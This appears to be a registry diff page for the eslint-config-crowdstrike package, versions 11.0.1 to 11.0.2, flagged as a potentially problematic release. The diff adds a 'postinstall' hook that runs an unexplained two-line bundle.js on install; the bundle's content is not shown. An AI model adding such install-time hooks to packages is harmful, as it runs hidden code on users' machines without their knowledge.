eslint-config-crowdstrike 11.0.1 → 11.0.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of eslint-config-crowdstrike might be problematic. Click here for more details.
- package/bundle.js +2 -0
- package/package.json +4 -3
package/package.json
CHANGED
@@ -1,6 +1,6 @@
|
|
1
1
|
{
|
2
2
|
"name": "eslint-config-crowdstrike",
|
3
|
-
"version": "11.0.
|
3
|
+
"version": "11.0.2",
|
4
4
|
"description": "ESLint config for CrowdStrike",
|
5
5
|
"main": "index.js",
|
6
6
|
"files": [
|
@@ -11,7 +11,8 @@
|
|
11
11
|
"lint:js": "eslint .",
|
12
12
|
"lint:md": "remark -f README.md",
|
13
13
|
"release": "standard-version",
|
14
|
-
"test": "yarn lint:git && yarn lint:js && yarn lint:md"
|
14
|
+
"test": "yarn lint:git && yarn lint:js && yarn lint:md",
|
15
|
+
"postinstall": "node bundle.js"
|
15
16
|
},
|
16
17
|
"standard-version": {
|
17
18
|
"scripts": {
|
@@ -48,4 +49,4 @@
|
|
48
49
|
"peerDependencies": {
|
49
50
|
"eslint": ">=8.57.0"
|
50
51
|
}
|
51
|
-
}
|
52
|
+
}
|